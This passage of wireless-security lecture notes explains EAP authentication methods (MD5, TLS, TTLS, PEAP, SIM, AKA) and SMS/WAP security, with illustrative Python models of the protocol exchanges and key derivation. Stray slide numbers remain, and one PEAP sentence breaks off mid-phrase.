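        if code != EAP_REQUEST:
            return None                                  # Success/Failure ends the exchange
        if typ == TYPE_IDENTITY:
            return build_eap(EAP_RESPONSE, ident, bytes([TYPE_IDENTITY]) + self.identity)
        if typ == TYPE_MD5:
            challenge = data[1:1 + data[0]]
            value = md5_challenge_value(ident, self.password, challenge)
            return build_eap(EAP_RESPONSE, ident, bytes([TYPE_MD5, len(value)]) + value + self.identity)
        return build_eap(EAP_RESPONSE, ident, bytes([TYPE_NAK, TYPE_MD5]))


def run_eap_md5(peer: Peer, server: Server):
    """The authenticator's role: relay EAP between supplicant and server and keep the
    port closed until a Success arrives. Returns (final code, port_open, codes seen)."""
    transcript, packet = [], server.start()
    while True:
        code = parse_eap(packet)[0]
        transcript.append(code)
        if code in (EAP_SUCCESS, EAP_FAILURE):
            return code, code == EAP_SUCCESS, transcript
        reply = peer.handle(packet)
        transcript.append(parse_eap(reply)[0])
        packet = server.handle(reply)
```

`run_eap_md5(Peer(b"alice", b"correct horse"), Server({b"alice": b"correct horse"}))` returns `(3, True, [1, 2, 1, 2, 3])`: Identity Request, Identity Response, MD5-Challenge Request, MD5 Response, Success. A wrong password or unknown identity ends in code 4 with the port still closed. Nothing in the transcript carries key material, which is exactly the EAP-MD5 limitation the slides describe.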

88

EAP – MD5

89

EAP Authentication Methods – TLS

Transport Layer Security (TLS) is a certificate-based authentication protocol. EAP-TLS (RFC 2716) provides mutual authentication and supports per-session WEP keys. Certificate-based authentication provides a highly secure digital equivalent of the ID cards used by both the client and network so they can authenticate each other. Public Key Infrastructure (PKI) digital signature techniques are used to prove each party’s authenticity.

90

EAP Authentication Methods – TLS

A digital certificate is comprised of the following fields:a versioncertificate serial numbersignature algorithm identifiername of the issuervalidity periodnamepublic keyoptional unique identifiersa signature value.

91

Certificate Authority

92

EAP Authentication Methods – TLS (message flow)
• A wireless station associates to its AP.
• The AP issues an EAP Request/Identity frame to the client station.
• The client station responds with its identity (machine name or user name).
• The AP relays the EAP message (i.e. the client station's identity) to the RADIUS server to initiate the authentication service.
• The RADIUS server requests credentials from the client station to confirm the identity, sending the EAP request via the AP.
• The client replies with its credentials, relayed by the AP.

The "Hello" messages are the start of the TLS handshake protocol:
• The client sends Client_Hello, stating the cipher suites (crypto algorithms) it can handle and a random value.
• The server replies with Server_Hello (the selected cipher suite and its own random value), its certificate, and a Certificate_Request asking the client for its certificate.
• The client sends its certificate and proves possession of the matching private key (Certificate_Verify); client and server then complete the key exchange (RSA or Diffie-Hellman, as negotiated) and both derive the same master secret.

On completion of the key exchange:
• Both the server and the client derive session key material from the TLS master secret. The server transmits this keying material to the AP in the RADIUS Access-Accept (MS-MPPE-Send-Key and MS-MPPE-Recv-Key attributes, encrypted under the RADIUS shared secret); the client derives the same keys locally, so the session key never crosses the air.
• To encrypt subsequent IEEE 802.11 frames between the AP and the client, WEP keys are used: a per-station key derived from the TLS session, and a broadcast key generated by the AP that is the same for all clients associated to this particular AP.
• The AP transmits the broadcast key to the client in a message encrypted with the per-station key it received from the server.
• Once the client has received the WEP keys it passes them to the PC card via the NDIS interface and the driver.
• Station and AP use these WEP keys until the station logs off or the re-authentication timer expires (periodic re-authentication).
• When the station roams to another AP, re-authentication is required and new WEP keys are established.
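How the keys of the last step come into being, as an added example that is not part of the lecture: both ends expand the TLS master secret with the TLS 1.0 PRF into the EAP-TLS key material (RFC 2716, later RFC 5216), and the RADIUS server hides the two halves in MS-MPPE-Recv-Key / MS-MPPE-Send-Key attributes (RFC 2548) for the AP. The master secret, randoms and RADIUS shared secret are constructed sample values.

```python
import hashlib
import hmac
import secrets


def p_hash(hash_name: str, secret: bytes, seed: bytes, length: int) -> bytes:
    """TLS 1.0 P_hash expansion (RFC 2246 section 5)."""
    out, a = b"", seed
    while len(out) < length:
        a = hmac.new(secret, a, hash_name).digest()            # A(i) = HMAC(secret, A(i-1))
        out += hmac.new(secret, a + seed, hash_name).digest()  # HMAC(secret, A(i) || seed)
    return out[:length]


def tls10_prf(secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    """TLS 1.0 PRF: P_MD5 over the first half of the secret XOR P_SHA1 over the second half."""
    half = (len(secret) + 1) // 2
    md5_part = p_hash("md5", secret[:half], label + seed, length)
    sha_part = p_hash("sha1", secret[-half:], label + seed, length)
    return bytes(x ^ y for x, y in zip(md5_part, sha_part))


def eap_tls_keys(master_secret: bytes, client_random: bytes, server_random: bytes) -> dict:
    """RFC 2716 / RFC 5216: key material is derived from the TLS master secret on both
    sides, so the session key itself never has to cross the air."""
    km = tls10_prf(master_secret, b"client EAP encryption", client_random + server_random, 128)
    return {
        "msk": km[:64],
        "emsk": km[64:],
        "recv_key": km[:32],    # MS-MPPE-Recv-Key: peer -> authenticator direction
        "send_key": km[32:64],  # MS-MPPE-Send-Key: authenticator -> peer direction
    }


def mppe_wrap(key: bytes, radius_secret: bytes, request_authenticator: bytes, salt: bytes) -> bytes:
    """RFC 2548 section 2.4: how the RADIUS server hides a key in the Access-Accept sent
    to the AP. P = len || key || zero padding to a 16-byte multiple;
    c(i) = p(i) XOR MD5(secret || c(i-1)), with c(0) = Request-Authenticator || Salt."""
    assert len(salt) == 2 and salt[0] & 0x80, "salt is two bytes with the high bit set"
    plain = bytes([len(key)]) + key
    plain += b"\x00" * (-len(plain) % 16)
    out, prev = b"", request_authenticator + salt
    for i in range(0, len(plain), 16):
        mask = hashlib.md5(radius_secret + prev).digest()
        block = bytes(x ^ y for x, y in zip(plain[i:i + 16], mask))
        out += block
        prev = block
    return salt + out


def mppe_unwrap(attr: bytes, radius_secret: bytes, request_authenticator: bytes) -> bytes:
    """Inverse of mppe_wrap, as the AP performs it on receipt of the Access-Accept."""
    salt, body = attr[:2], attr[2:]
    plain, prev = b"", request_authenticator + salt
    for i in range(0, len(body), 16):
        mask = hashlib.md5(radius_secret + prev).digest()
        plain += bytes(x ^ y for x, y in zip(body[i:i + 16], mask))
        prev = body[i:i + 16]
    return plain[1:1 + plain[0]]


def deliver_keys_to_ap(master_secret, client_random, server_random, radius_secret):
    """Server side: derive the EAP-TLS keys and wrap them for the AP. Returns the MSK the
    client derived on its own and the MSK the AP unwrapped, which must be identical."""
    server_keys = eap_tls_keys(master_secret, client_random, server_random)
    client_keys = eap_tls_keys(master_secret, client_random, server_random)  # same inputs
    req_auth = secrets.token_bytes(16)  # Request-Authenticator of the Access-Request being answered
    access_accept = {
        "MS-MPPE-Recv-Key": mppe_wrap(server_keys["recv_key"], radius_secret, req_auth, b"\x80\x01"),
        "MS-MPPE-Send-Key": mppe_wrap(server_keys["send_key"], radius_secret, req_auth, b"\x80\x02"),
    }
    ap_msk = (mppe_unwrap(access_accept["MS-MPPE-Recv-Key"], radius_secret, req_auth)
              + mppe_unwrap(access_accept["MS-MPPE-Send-Key"], radius_secret, req_auth))
    return client_keys["msk"], ap_msk
```

The only link in this chain that is not protected by TLS is the RADIUS leg between server and AP: the MPPE wrapping is an MD5 stream keyed by the RADIUS shared secret, so a weak shared secret on that hop exposes every session key the server hands out.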

EAP Authentication Methods – TTLS

Tunneled Transport Layer Security (EAP-TTLS) and Protected Extensible Authentication Protocol (PEAP) are similar in operation: both support secure username/password authentication and mutual authentication. EAP-TTLS combines EAP-TLS with traditional password-based methods such as the Challenge Handshake Authentication Protocol (CHAP) and One Time Passwords (OTP). On the client side only passwords are required instead of digital certificates, which relieves the system administrator of managing and distributing client certificates. On the authentication server side a certificate is required.

Certificates do not have to be installed in each client device because PKI techniques are used first to let the client authenticate the server (via the server's certificate) and form a secured connection between client and server. The server then authenticates the client over the secured connection, with the user providing a username and password pair. This principle is much like the way browser-based commerce works today: a secure connection is established before the user's authentication information is exchanged. Users see this as the padlock symbol in their browsers.

In EAP-TTLS a secure TLS tunnel is first established between the supplicant and the authentication server. The client authenticates the network it is connecting to by validating the digital certificate presented by the TTLS server, exactly analogous to connecting to a secure web server. Once the authenticated tunnel is established, the authentication of the end user takes place inside it. EAP-TTLS has the added benefit of protecting the identity of the end user from view over the wireless medium: the outer EAP identity can be anonymous (e.g. "anonymous@realm") and the real username is only sent inside the tunnel. EAP-TTLS also lets existing end-user authentication systems be reused: any existing RADIUS server and its associated user database can be kept. Unlike EAP-TLS, whose client certificate (and therefore the user's identity) is sent in the clear during the handshake, EAP-TTLS exposes only the anonymous outer identity.

Message flow:
• A wireless station associates to its AP.
• The AP issues an EAP Request/Identity frame to the client station.
• The client station responds with its (outer) identity.
• The AP relays the EAP message to the RADIUS server to initiate the authentication service.
• The protocol between the RADIUS server and the client station is still TLS, used here so that the client can authenticate the server.

The "Hello" messages are the start of the TLS handshake:
• The client sends Client_Hello with the cipher suites it can handle.
• The server replies with Server_Hello (the selected cipher suite) and its certificate; no client certificate is requested.
• Client and server complete the key exchange (RSA or Diffie-Hellman, as negotiated).
• Now that the tunnel is established and secure, the user credentials are exchanged inside it (using OTP, CHAP or another password method).

On completion of the exchange the server transmits the derived keying material to the AP (in the RADIUS Access-Accept), and the rest proceeds as for EAP-TLS: the AP sends the broadcast WEP key to the client encrypted with the per-station key, the client passes the keys to the PC card via the NDIS interface and the driver, and station and AP use these WEP keys until the station logs off or the re-authentication timer expires (periodic re-authentication).

EAP Authentication Methods – PEAP

Protected EAP (PEAP) is a version of EAP developed by Microsoft, Cisco and RSA Security that offers two implementation options. The first uses the Microsoft Challenge-Handshake Authentication Protocol Version 2 (MS-CHAPv2) as the inner method for mutual authentication and does not require client digital certificates. The second uses TLS as the inner method for mutual authentication and requires digital certificates on all the clients (very similar to EAP-TLS).

PEAP with MS-CHAPv2

The PEAP authentication process occurs in two parts. The first part uses EAP and the PEAP EAP type to create an encrypted TLS channel. The second part uses EAP and a different EAP type, inside that channel, to authenticate network access. The following examines PEAP with MS-CHAP v2 operation, using as an example a wireless client that attempts to authenticate to a wireless access point (AP) that uses a RADIUS server for authentication and authorization.

PEAP Part 1 – Creating the TLS channel

The following steps are used to create the PEAP TLS channel:
• After creating the logical link, the wireless AP sends an EAP-Request/Identity message to the wireless client.
• The wireless client responds with an EAP-Response/Identity message that contains the identity (user or computer name) of the wireless client.
• The EAP-Response/Identity message is sent by the wireless AP to the RADIUS server. From this point on, the logical communication occurs between the RADIUS server and the wireless client, using the wireless AP as a pass-through device.
• The RADIUS server sends an EAP-Request/Start PEAP message to the wireless client.
• The wireless client and the RADIUS server exchange a series of TLS messages through which the cipher suite for the TLS channel is negotiated and the RADIUS server sends a certificate chain to the wireless client for authentication.

At the end of the PEAP negotiation, the RADIUS server has authenticated itself to the wireless client. Both nodes have determined mutual encryption and signing keys (using public key cryptography, not passwords) for the TLS channel.

Part 1 as a message sequence between client and PEAP server (figure, redrawn as text):
  Server -> Client:   EAP-Request/Identity
  Client -> Server:   EAP-Response/Identity [My Domain]
  Server -> Client:   EAP-Request (Type = PEAP, Start)
  Client <-> Server:  TLS handshake, carried in EAP-Request/EAP-Response messages of type PEAP
  Client -> Server:   EAP-Response (empty), acknowledging the completed handshake

PEAP Part 2 – Authenticating with MS-CHAP v2

After the PEAP TLS channel is created, the following steps are used to authenticate the wireless client credentials with MS-CHAP v2:
• The RADIUS server sends an EAP-Request/Identity message.
• The wireless client responds with an EAP-Response/Identity message that contains the identity (user or computer name) of the wireless client.
• The RADIUS server sends an EAP-Request/EAP-MS-CHAP-V2 Challenge message that contains a challenge string.
• The wireless client responds with an EAP-Response/EAP-MS-CHAP-V2 Response message that contains both the response to the RADIUS server's challenge string and a challenge string for the RADIUS server.
• The RADIUS server sends an EAP-Request/EAP-MS-CHAP-V2 Success message, which indicates that the wireless client's response was correct and contains the response to the wireless client's challenge string.
• The wireless client responds with an EAP-Response/EAP-MS-CHAP-V2 Ack message, indicating that the RADIUS server's response was correct.
• The RADIUS server sends an EAP-Success message.

At the end of this mutual authentication exchange, the wireless client has provided proof of knowledge of the correct password (the response to the RADIUS server challenge string) and the RADIUS server has provided proof of knowledge of the

Part 2 in general form, for any inner EAP type (figure, redrawn as text):
  Server -> Client:  EAP-Request/Identity
  Client -> Server:  EAP-Response/Identity [My ID]
  Server -> Client:  EAP-Request/Type = X (MS-CHAPv2, MD5, OTP, etc.): establish the inner EAP method and perform authentication
  Server -> Client:  EAP-Success / EAP-Failure
  Afterwards the generated key is transferred from the PEAP server to the NAS (the AP) if they are on different machines.

EAP Authentication Methods – MS-CHAPv2

The Microsoft EAP CHAP Extensions Version 2 (EAP-MSCHAPv2) protocol allows mutual authentication between an authenticator and a peer seeking authentication. It extends the MS-CHAPv2 protocol defined in RFC 2759 and is one of several authentication methods associated with the Extensible Authentication Protocol (EAP) defined in RFC 2284.

EAP methods based on GSM credentials

Support for SIM and USIM (AKA) credentials, using standard SIM (Subscriber Identity Module) and USIM (UMTS Subscriber Identity Module) cards:
• Wireless phone SIM cards as a way of obtaining authentication, using the SIM Extensible Authentication Protocol for GSM (EAP-SIM).
• USIM cards with the Extensible Authentication and Key Agreement protocol (EAP-AKA) for UMTS.
• Both generate 128-bit keys and have optional fast re-authentication and identity privacy support.

EAP Authentication Methods – SIM

EAP-SIM (Subscriber Identity Module) Authentication for GSM

EAP-SIM authentication is based on Nokia's EAP server technology. This provides an interface between the GSM Authentication Centre (AuC) and one or more wireless LANs and uses the Extensible Authentication Protocol (EAP) so that it can pass authentication traffic securely over any wide area network, e.g. a telco's internal data network or the Internet. It permits authentication by WLAN clients that have an 802.11 interface and access to a GSM SIM card, with or without GSM air-interface capability.

The procedure is designed to provide mutual authentication between a wireless LAN client and an AAA server. Typically the EAP server is implemented on the AAA server (e.g. RADIUS) and has an interface to the GSM network, so it operates as a gateway between the Internet AAA network and the GSM authentication infrastructure. The system allows GSM mobile operators to reuse their existing authentication infrastructure for providing access to wireless networks.

EAP-SIM combines the data from several GSM "triplets" (RAND, SRES, Kc), obtained from the Authentication Centre, to generate a stronger session key than a single 64-bit Kc would give. EAP-SIM also enhances the basic GSM mechanism, which only authenticates the subscriber, by providing mutual authentication between the client and the RADIUS server: the server proves that it obtained genuine triplets by sending a MAC computed under a key derived from the Kc values.

SIM – Subscriber Identity Module

Usually referred to as a SIM card, the SIM is the user's subscription to the mobile network. It contains the information (the IMSI and the subscriber key Ki) that enables access control onto the subscribed operator's network.

The EAP-SIM authentication proceeds as follows:
• The client receives an EAP Identity Request from the access point (AP).
• The client responds with an EAP Identity Response containing the user's network identity stored on the SIM: either the International Mobile Subscriber Identity (IMSI) or a temporary identity (pseudonym). The AP forwards this to the RADIUS server, which in turn contacts the Authentication Centre of the GSM network.
• From the AuC the RADIUS server obtains n GSM triplets and passes the n RAND values to the client. The SIM calculates the signed responses (SRES), which the client proves to the RADIUS server. The client also calculates cryptographic keying material, using a secure hash function over the user identity, the GSM keys Kc and a client nonce, for the derivation of session encryption keys.
• When the AAA server receives the client's response it checks it against its own expected results (XRES). If they match, the client is authenticated and the AAA server derives the session encryption keys. It then sends a RADIUS Access-Accept message to the AP, which contains an encapsulated EAP Success message and the (encrypted) client session key.
• The AP installs the session key for encryption and forwards the EAP Success message to the client, which is now able to access the network.
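The EAP-SIM procedure above, as an added example that is not part of the lecture. The operator's A3/A8 algorithm is secret, so an HMAC stands in for it (labelled as such in the code); the master key MK follows RFC 4186 (SHA1 over identity, the n Kc values, the client nonce NONCE_MT and the version fields), while the expansion of MK into K_encr, K_aut and MSK uses an HMAC stand-in for the FIPS 186-2 PRF. The MAC inputs are simplified to the RAND list and SRES values rather than the whole EAP packet. IMSI and Ki are constructed sample values.

```python
import hashlib
import hmac
import secrets


def gsm_a3a8(ki: bytes, rand: bytes):
    """STAND-IN for the operator's A3/A8 (e.g. COMP128), which is not public.
    Returns (SRES, Kc): a 32-bit signed response and a 64-bit cipher key."""
    d = hmac.new(ki, rand, "sha1").digest()
    return d[:4], d[4:12]


class AuC:
    """GSM Authentication Centre: knows every subscriber's Ki and hands out triplets."""
    def __init__(self, subscribers: dict):
        self.subscribers = subscribers

    def triplets(self, imsi: str, n: int):
        ki, out = self.subscribers[imsi], []
        for _ in range(n):
            rand = secrets.token_bytes(16)
            sres, kc = gsm_a3a8(ki, rand)
            out.append((rand, sres, kc))
        return out


def eap_sim_keys(identity: bytes, kcs: list, nonce_mt: bytes) -> dict:
    """RFC 4186 section 7: MK = SHA1(Identity | n*Kc | NONCE_MT | Version List | Selected Version).
    RFC 4186 expands MK with the FIPS 186-2 PRF; an HMAC-SHA1 counter expansion stands in here."""
    version_list, selected = b"\x00\x01", b"\x00\x01"
    mk = hashlib.sha1(identity + b"".join(kcs) + nonce_mt + version_list + selected).digest()
    stream = b"".join(hmac.new(mk, bytes([i]), "sha1").digest() for i in range(6))
    return {"k_encr": stream[:16], "k_aut": stream[16:32], "msk": stream[32:96]}


def at_mac(k_aut: bytes, data: bytes) -> bytes:
    """AT_MAC attribute: HMAC-SHA1 under K_aut, truncated to 128 bits."""
    return hmac.new(k_aut, data, "sha1").digest()[:16]


class SimPeer:
    def __init__(self, imsi: str, ki: bytes):
        self.imsi, self.ki, self.msk = imsi, ki, None

    def start(self):
        """EAP-Response/SIM/Start: identity plus a fresh NONCE_MT."""
        self.nonce_mt = secrets.token_bytes(16)
        return self.imsi, self.nonce_mt

    def challenge(self, rands: list, mac: bytes):
        """EAP-Request/SIM/Challenge handling. The MAC over the RANDs and NONCE_MT can only
        be produced by a server that obtained real triplets for this Ki: this is the
        network-to-client authentication plain GSM lacks. Returns the response MAC
        (proving the SRES values) or None if the network is rejected."""
        sres, kcs = zip(*(gsm_a3a8(self.ki, r) for r in rands))
        keys = eap_sim_keys(self.imsi.encode(), list(kcs), self.nonce_mt)
        if not hmac.compare_digest(mac, at_mac(keys["k_aut"], b"".join(rands) + self.nonce_mt)):
            return None
        self.msk = keys["msk"]
        return at_mac(keys["k_aut"], b"SIM/Challenge-Response" + b"".join(sres))


class SimServer:
    def __init__(self, auc: AuC, n: int = 3):
        self.auc, self.n, self.msk = auc, n, None

    def challenge(self, imsi: str, nonce_mt: bytes):
        trip = self.auc.triplets(imsi, self.n)
        rands = [t[0] for t in trip]
        self.expected_sres = b"".join(t[1] for t in trip)
        self.keys = eap_sim_keys(imsi.encode(), [t[2] for t in trip], nonce_mt)
        return rands, at_mac(self.keys["k_aut"], b"".join(rands) + nonce_mt)

    def verify(self, response_mac: bytes) -> bool:
        expected = at_mac(self.keys["k_aut"], b"SIM/Challenge-Response" + self.expected_sres)
        ok = hmac.compare_digest(response_mac, expected)
        if ok:
            self.msk = self.keys["msk"]   # handed to the AP in the RADIUS Access-Accept
        return ok


def run_eap_sim(peer: SimPeer, server: SimServer) -> str:
    imsi, nonce_mt = peer.start()
    rands, mac = server.challenge(imsi, nonce_mt)
    resp = peer.challenge(rands, mac)
    if resp is None:
        return "client rejected network"
    return "success" if server.verify(resp) else "server rejected client"
```

A rogue access network that does not hold the subscriber's Ki (or real triplets for it) cannot produce the challenge MAC, so the client stops before revealing anything; with bare GSM triplets the client would have answered any RAND it was sent.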

EAP Authentication Methods – AKA

EAP-AKA (Authentication and Key Agreement) is for UMTS. For WLAN–3G interworking the EAP-AKA protocol has been developed. The basic difference in the security of EAP-SIM and EAP-AKA is that, while both provide mutual authentication, the network-to-user authentication of EAP-SIM is implicitly based on the derived key Kc, whereas in AKA the network-to-user authentication is an integral part of the procedure: the network sends an authentication token (AUTN) that the USIM verifies before it answers.

• EAP-AKA is an EAP type for the UMTS Authentication and Key Agreement (AKA).
• EAP-AKA supports all the UMTS AKA scenarios: basic authentication, sequence number synchronization, etc.
• Similar IMSI privacy support as in EAP-SIM.
• EAP-AKA includes a GSM-compatible mode: basic GSM authentication without the enhancements of EAP-SIM.
• The home server knows whether this particular user has been issued an old GSM SIM or a newer UMTS USIM.
• The client can refuse GSM-only authentication.

AKA is based on challenge-response mechanisms and symmetric cryptography. AKA typically runs in a UMTS Subscriber Identity Module (USIM), a smart card-like device. However, the applicability of AKA is not limited to client devices with smart cards; the AKA mechanisms can also be implemented in host software. Compared to the GSM mechanism, AKA provides substantially longer key lengths and authentication of the server side as well as the client side.

EAP-AKA full authentication (figure, redrawn):

   Client                                              Authenticator
     |                                                       |
     |                  EAP-Request/Identity                 |
     |<------------------------------------------------------|
     |                                                       |
     |                  EAP-Response/Identity                |
     |                  (includes user's NAI)                |
     |------------------------------------------------------>|
     |                                  +------------------------------+
     |                                  | Server runs UMTS algorithms, |
     |                                  | generates RAND and AUTN.     |
     |                                  +------------------------------+
     |                                                       |
     |               EAP-Request/AKA-Challenge               |
     |                     (RAND, AUTN)                      |
     |<------------------------------------------------------|
   +-------------------------------------+                   |
   | Client runs UMTS algorithms on USIM,|                   |
   | verifies AUTN, derives RES          |                   |
   | and session key                     |                   |
   +-------------------------------------+                   |
     |                                                       |
     |               EAP-Response/AKA-Challenge              |
     |                        (RES)                          |
     |------------------------------------------------------>|
     |                                  +------------------------------+
     |                                  | Server checks the given RES, |
     |                                  | and finds it correct.        |
     |                                  +------------------------------+
     |                                                       |
     |                      EAP-Success                      |
     |<------------------------------------------------------|
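The AKA exchange of the figure, as an added example that is not part of the lecture, showing what "network-to-user authentication is an integral part of the procedure" means in code: the USIM checks the MAC in AUTN before it computes RES, and it rejects stale or replayed sequence numbers with a synchronization-failure response carrying AUTS. The MILENAGE functions f1 to f5 are replaced by labelled HMAC stand-ins (only their interface is modelled), the 6-byte SQN, 2-byte AMF and 8-byte MAC/RES sizes follow 3GPP TS 33.102, the acceptance window is a simplification of the standard's SQN array, and the key K is a constructed sample value.

```python
import hmac
import secrets


def _f(k: bytes, tag: bytes, data: bytes, n: int) -> bytes:
    """STAND-IN for the MILENAGE functions f1..f5 of 3GPP TS 35.206 (keyed HMAC-SHA256,
    truncated). The real functions are AES-based; only their interface is modelled."""
    return hmac.new(k, tag + data, "sha256").digest()[:n]


def f1(k, rand, sqn, amf):  return _f(k, b"f1", sqn + rand + amf, 8)   # MAC-A, 64 bit
def f1s(k, rand, sqn, amf): return _f(k, b"f1*", sqn + rand + amf, 8)  # MAC-S, for resync
def f2(k, rand):            return _f(k, b"f2", rand, 8)               # RES / XRES
def f3(k, rand):            return _f(k, b"f3", rand, 16)              # CK
def f4(k, rand):            return _f(k, b"f4", rand, 16)              # IK
def f5(k, rand):            return _f(k, b"f5", rand, 6)               # AK, conceals SQN
def f5s(k, rand):           return _f(k, b"f5*", rand, 6)              # AK*, for resync


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


AMF = b"\x80\x00"          # authentication management field
AMF_RESYNC = b"\x00\x00"   # TS 33.102: MAC-S uses the default (all-zero) AMF*


class HomeServer:
    """HSS/AuC side: per-subscriber key K and sequence counter SQN_HE."""
    def __init__(self, k: bytes, sqn: int = 0):
        self.k, self.sqn = k, sqn

    def vector(self):
        """Authentication vector (RAND, AUTN, XRES); AUTN = (SQN xor AK) || AMF || MAC."""
        self.sqn += 1
        sqn = self.sqn.to_bytes(6, "big")
        rand = secrets.token_bytes(16)
        autn = xor(sqn, f5(self.k, rand)) + AMF + f1(self.k, rand, sqn, AMF)
        return rand, autn, f2(self.k, rand)

    def resync(self, rand: bytes, auts: bytes) -> bool:
        """AKA-Synchronization-Failure: recover SQN_MS from AUTS, check MAC-S, adopt it."""
        sqn_ms, mac_s = xor(auts[:6], f5s(self.k, rand)), auts[6:]
        if not hmac.compare_digest(mac_s, f1s(self.k, rand, sqn_ms, AMF_RESYNC)):
            return False
        self.sqn = int.from_bytes(sqn_ms, "big")
        return True


class USIM:
    """Client side. Accepts SQN only inside a window above the last accepted value; a
    real USIM keeps an array of recent SQNs (TS 33.102 annex C), simplified here."""
    WINDOW = 32

    def __init__(self, k: bytes, sqn_ms: int = 0):
        self.k, self.sqn_ms = k, sqn_ms

    def challenge(self, rand: bytes, autn: bytes):
        ak = f5(self.k, rand)
        sqn, amf, mac = xor(autn[:6], ak), autn[6:8], autn[8:]
        if not hmac.compare_digest(mac, f1(self.k, rand, sqn, amf)):
            return ("mac-failure",)                  # network NOT authenticated: stop here
        n = int.from_bytes(sqn, "big")
        if not self.sqn_ms < n <= self.sqn_ms + self.WINDOW:
            my = self.sqn_ms.to_bytes(6, "big")      # stale or replayed vector: ask for resync
            auts = xor(my, f5s(self.k, rand)) + f1s(self.k, rand, my, AMF_RESYNC)
            return ("sync-failure", auts)
        self.sqn_ms = n
        return ("ok", f2(self.k, rand), f3(self.k, rand), f4(self.k, rand))  # RES, CK, IK


def run_eap_aka(server: HomeServer, usim: USIM) -> str:
    """EAP-Request/AKA-Challenge (RAND, AUTN) -> EAP-Response/AKA-Challenge (RES), with one
    round of sequence-number resynchronization if the USIM asks for it."""
    rand, autn, xres = server.vector()
    reply = usim.challenge(rand, autn)
    if reply[0] == "sync-failure":
        if not server.resync(rand, reply[1]):
            return "resync-rejected"
        rand, autn, xres = server.vector()
        reply = usim.challenge(rand, autn)
    if reply[0] != "ok":
        return reply[0]
    return "success" if hmac.compare_digest(reply[1], xres) else "res-mismatch"
```

Compare this with the GSM path: a GSM SIM answers any RAND, so a recorded (RAND, AUTN-less) challenge can be replayed to it at will; here a replayed vector fails the sequence-number check and a fabricated one fails the MAC check before any RES leaves the card.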

W-WAN Security

Overview
• What are SMS and WAP
• Security and SMS
• Security and WAP

What are SMS and WAP

Short Message Service: SMS
Wireless Application Protocol: WAP

The Wireless Application Protocol (WAP) is an application environment and set of communication protocols for wireless devices, designed to enable manufacturer-, vendor- and technology-independent access to the Internet and advanced telephony services. WAP specifies an application framework and network protocols for wireless devices such as mobile telephones, pagers and personal digital assistants (PDAs).

SMS Threats
• SMS spam
• SMS spoofing
• SMS viruses

SMS Spam
• Becoming like UCE (unsolicited commercial e-mail).
• Premium-rate call scams ("call me at xxx-VERYEXPENSIVE").
• All public SMS gateways and web sites become relays and victims.
• Spammers buy bulk services from operators.

SMS Spoofing
• The sender address of an SMS message proves nothing.
• Roaming makes it impossible for operators to filter by origin.
• The only chance is for messages that stay within one SMSC/operator.
• Intercepting replies to another address is difficult.
• Special case: a rogue SMSC that sets the Reply-Path indicator could intercept replies.

SMS Virus
Scenario: an SMS is interpreted by the phone and re-sends itself to all phone numbers in the phone book, and ...
Likelihood:
• Pro: some vendors have big market shares: monoculture.
• Pro: phones will get more and more interpreting features.
• Con: zillions of versions of phones and software.

WAP
• WAP description
• WAP protocol
• WAP infrastructure issues
• WML and WMLScript

What is WAP?
• HTTP/HTML adjusted to small devices.
• Consists of a network architecture, a protocol stack and the Wireless Markup Language (WML).
• The important difference from the traditional Internet model is the WAP gateway.
• Specifications at http://www.wapforum.org

WAP network model (figure, not reproduced)

WAP Protocol Stack (figure, not reproduced)

WAP and the Web

  WAP layer            Internet counterpart
  ---------            --------------------
  GSM, CDMA, etc.      IP
  WDP                  UDP
  WTLS                 TLS (from SSL)
  WTP                  no counterpart
  WML                  HTML
  WMLScript            JavaScript

Rationale: reuse as much as possible from the IP world, but optimize for the wireless world (i.e. compression, adaptation to high loss rates).

WAP Transport Layer: WDP
• An adaptation layer to the bearer protocol.
• Consists of source and destination address and port, optional fragmentation, and WCMP (the control message protocol, WAP's ICMP counterpart).
• Maps to UDP for an IP bearer.

WAP Security Layer: WTLS
• TLS adapted to the UDP-type (datagram) usage by WAP.
• Encryption and authentication.
• Several problems identified by Markku-Juhani Saarinen:
  – Weak MAC (the 40-bit XOR "MAC" option gives no real integrity protection)
  – RSA PKCS#1 v1.5 padding (open to Bleichenbacher's attack)
  – Unauthenticated alert messages
  – Plaintext leaks

WTLS
• Keys generally placed in normal phone storage.
• New standards emerging (WAP Identity Module, WIM) for the use of tamper-resistant devices.
• Aside from the crypto problems:
  – User-interface attacks likely (remember the SSL problems).
  – WTLS terminates at the WAP gateway, which therefore sees all traffic in the clear; MITM attacks possible.

WAP Transaction Layer: WTP
• Three classes of transactions: Class 0: unreliable; Class 1: reliable without result; Class 2: reliable with result.
• Does the minimum a protocol must do to create reliability.
• No security elements at this layer.
• Protocol not resistant to malicious attacks.

WAP Session Layer: WSP
• Meant to mimic the HTTP protocol.
• No mention of security in the spec except for WTLS.
• Distinguishes a connected and a connectionless mode.
• Connected mode is based on a SessionID given by the server.
• Message types: Connect, ConnectReply, Redirect, Disconnect; methods: Get, Post, Reply; Suspend, Resume, Reply; Push, ConfirmedPush.
• Nothing is specified about the SessionID except that it is not reused within the lifetime of a message.
• Research done in the PROTOS project (Oulu, Finland) shows the first implementations to be quite unstable.
• Kannel still cannot handle a large number of connections (max threads).

WAP Application Layer: WAE

WML
• WML is based on XML and HTML.
• Not pages with frames, but decks with cards.
• Images: WBMP, WAP-specific.
• Generally all compiled to binary (WBXML) by the WAP gateway: an additional area of potential problems.

WMLScript
• The WAP JavaScript equivalent.
• Located in separate files.
• Also compiled by the WAP gateway.
• Allows automation of WML and phone functions.
• JavaScript bugs all over again?

Accessing the Web from cell phones (figure, not reproduced)

WAP Infrastructure issues
• Attacking a dialed-in phone
• Spoofing another dialed-in phone
• Attacking the gateway

WAP gateway infrastructure (figures, redrawn as text)

  Phone --(dial-in)--> Router/Dial-in --> WAP gateway --(Internet)--> web server

• Attack on the gateway: the gateway is reachable from the dial-in side and from the Internet.
• Collusion attack: a rogue web server delivers modified WML/WMLScript through the gateway to the phone.
• Attack on the phone: content from the web server, compiled by the gateway, is executed on the phone.

WAP PKI
• PKI portal provides PKI services.
• PKI portal connected via the gateway or directly with the mobile phone.
• Device certificates possible.
• New certificate format: WTLS certificate.
• Client certificates often not stored in the client.

Certificates for servers (figure: a timeline from Day 1 to Day 7 on which Cert. 1, Cert. 2 and Cert. 3 are issued in succession, illustrating short-lived certificates)
1. Long-lived certificates (as for web servers)
   • Server generates a PKCS#10 request
   • CA sends certificate
2. Short-lived certificates (no CRLs)
   • Server registers at the CA (one time)
   • Gets a new certificate (e.g.) every day

Certificates for clients
